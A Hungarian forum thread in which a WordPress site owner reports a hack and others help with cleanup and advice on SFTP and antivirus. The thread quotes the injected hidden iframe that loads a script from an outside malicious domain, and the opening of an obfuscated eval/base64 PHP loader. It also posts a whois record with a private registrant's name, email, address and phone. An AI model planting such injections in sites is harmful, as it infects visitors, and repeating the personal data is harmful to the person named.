22 válasz erre a témára

[Lelkes amatőr]

Sziasztok!

WP 3.0.5 oldal, aktuális mentésekor feltűnt, hogy van 2 furcsa file a főkönyvtárban.
Erre megnézem az index.php-t, és van a végén egy -szerintem- plusz sor:
?><iframe heigth="1" width="1" frameborder="0" src="http://alcobro.net/t.php?id=3415357"></iframe>

A két file pedig így kezdődött:
<? eval(gzuncompress(base64_decode(' és itt jött a sok kódolt adat...

Egyre gyanúsabb lett a dolog.
Az oldalamon egyébként semmi nem tűnt fel. Max egy kicsit lassú lett, de ezt a folyamatos bővítésnek tudtam be.
Theme: Constructor
Plugin: Akismet (kikapcsolva), All-in-one SEO, Azigen, Contact form 7, google-sitemap generator, Theme-my-login, wp e-commerce, wp-polls, yd-recent-posts-widget (kikapcsolva)

Az index.php-t a legutóbbi mentésére lecseréltem.

Tapasztalt szakik: Az adatbázisomba is belemászhatott? Mindent újra felépíteni elég macera... Főleg az e-commerce miatt.
A Security Scan-t egy másik oldalamon már kipróbáltam, az oldal lehalt tőle.

FTP jelszót már módosítottam.
+1 kérdés, mi számít biztonságos FTP-zésnek? Winscp, Filezilla... ?

[hgrg]

whois a domainre:

Domain Name: ALCOBRO.NET

Registrant:
    Private Person
    Andrej A Verba        (sdqazxswedcvfrtgbnhyujmkiol@gmail.com)
    ulica Universitetskaya 96a
    Kemerovo
    ,200133
    RU
    Tel. +7.322127925004

Creation Date: 15-Nov-2010
Expiration Date: 15-Nov-2011

Domain servers in listed order:
    ns3.everydns.net
    ns4.everydns.net


Administrative Contact:
    Private Person
    Andrej A Verba        (sdqazxswedcvfrtgbnhyujmkiol@gmail.com)
    ulica Universitetskaya 96a
    Kemerovo
    ,200133
    RU
    Tel. +7.322127925004

Technical Contact:
    Private Person
    Andrej A Verba        (sdqazxswedcvfrtgbnhyujmkiol@gmail.com)
    ulica Universitetskaya 96a
    Kemerovo
    ,200133
    RU
    Tel. +7.322127925004

Billing Contact:
    Private Person
    Andrej A Verba        (sdqazxswedcvfrtgbnhyujmkiol@gmail.com)
    ulica Universitetskaya 96a
    Kemerovo
    ,200133
    RU
    Tel. +7.322127925004

I Love U Russia..

[hgrg]

Bajtársak:
http://blog.vivekjishtu.com/
http://forum.joomla....f=432&p=2428498

Kicsit utánanéztem:
a domain ahova a dolog mutat a gogax.com-on hostoldóik..
dedikált gépeket adnak bérbe. van bejelentő címük:
abuse@gogax.com
...
pár percet érdemes az ilyesmikre rászánni.. mondjuk ahogy elnéztem mindenféle bejelentő oldalakon 100+ náluk üzemelő offending ip van kb..

[Lelkes amatőr]

Köszi az infókat, de sajnos a kérdéseim még megmaradtak.
Szerinted az adatbázis is fertőződött?
Újra kell építenem mindent?
Mi számít biztonságos FTP-nek?

[Lelkes amatőr]

Nem csak nekem vannak gondjaim a hívatlan látogatókkal:
http://index.hu/tech...lt_a_wordpress/

[mano]

szerintem van egy kis különbség egy szerver megtámadása, és a te honlapod fertőzése között!

egyébként mintha még mindig nem tudnánk, hogy melyik lapról is van szó pontosan...

[Lelkes amatőr]

Több oldalon jelent meg ugyanaz a fertőzés.
hgrg direktben kért és kapott infókat.
Pl. www.napelemguru.hu

[Lelkes amatőr]

Azóta kiderítettem a következőket:
A wp-admin könyvtárban levő index.php-t ugyanígy kiegészítette a saját kódjával.
Létrehozott a főkönyvtárban és a wp-admin könyvtárban is .htaccess file-t.
Fura, de a főkönyvtárban is létrejött egy virused.zip, valamint egy rejtett .log könyvtár, ahol temérdek html file van.
Úgy néz ki az adatbázist nem bántotta.

[Lelkes amatőr]

Bocsánat, a virused.zip már hgrg terméke.

[hgrg]

igen.. tartalmaz pár file-t amikben láthatod a "vírus" visszafejtett változatát.. a legalsó szintig nem mentem el,de már kb érthető h mit is csinál.. az 1.php ill 2.php pedig a használt függvényeket írja ki mert persze azok is kódolva vannak

[Lelkes amatőr]

Gratulálok (és egy kicsit irigykedek), hogy ez neked érthető. Nekem kb. olyan, mintha egy már rég kihalt japán nyelvjárást kellene olvasnom.
A többi oldalról már úgy tűnik leirtottam az "aranyost", most már sorra kerítem ezt is.

Már csak 1 kérdésem maradt: Mi az ajánlott, biztonságos FTP javaslat?
Már nem merek semmilyen jelszót eltároltatni a böngészővel, az FTP programokkal, de azt nem tudom, hogy a legutóbbi munkamenetről marad-e valamilyen nyom. Mert akkor 1 oldal mindig nyitott könyv lesz az aktuális támadónak.

[hgrg]

SFTP-t érdemes használni.. vagy FTP over SSH-t legalább..
hogy miért? mert különben nem lesz titkosított az átvitel, FTP eseténa jelszó plaintextben megy át..

[Farkas Győző]

Mindenesetre (az FTP-kapcsolat-kérdésen túl) a saját gépeden át kellene engedni egy jópofa víruskergetőt (pl. NOD32), mert 99%, hogy a baj gyökere ott leledzik. Ha nem teszed, akkor gondosan és rendszeresen visszafertőzöd magadat, bármennyire is biztonságos FTP-t használsz.

[hgrg]

igen megintcsak sikerült a számomra alapvetőt dolgot kihagyni:
ha vírusos gépről kapcsolódsz akkor elszedhetik a jelszavadat... ez ilyen egyszerű..

csak olyan gépről dolgozz amiben megbízol..

[Lelkes amatőr]

Csak a saját gépemről lépek fel ezekre az oldalakra. A gépemen vásárolt NOD32 fut már több éve, ezen kívül hetente futtatom a Malwarebyte's anti Malware és a Spybot Search & Destroy párost.
Ennek ellenére történtek ezek az esetek.
Az első alkalommal felvettem a kapcsolatot a NOD32 forgalmazóival. Távirányítással (2*is) próbálta megtalálni a vírust, ami nem sikerült.
Ekkor telepítettünk egy web naplózó programot, ami valószínűsített egy fertőzést.
Ezt nekem kellett leszednem a gépről, mert egyik program sem azonosította be. A file még mindig ott van egy spec könyvtárban a gépemen, de a közben 10-12 alkalommal frissített NOD32 sem ismeri még fel.
Ennyivel járnak előbb az írók mint az irtók.

[hgrg]

nos amit mondani tudok: ne legyen aktív a winyo miközben nézed.. pld én nemes egyszerűséggel beraknámegy másik gépbe, valamiféle linux verzióval nézetném át..

[mano]

kaspersky - és ha lecserélnéd a vásárolt nod-ot, nyugodtan keress meg!

[Lelkes amatőr]

Köszi mano, most hosszabbítottam 3 évet, ha letelt, kereslek.

[Farkas Győző]

A ",ha..." rész felesleges és ízléstelen megjegyzésed volt - szerintem.

[hgrg]

én jóhiszeműen azt hiszem, hogy csak egy fanyar megjegyzés akart lenni..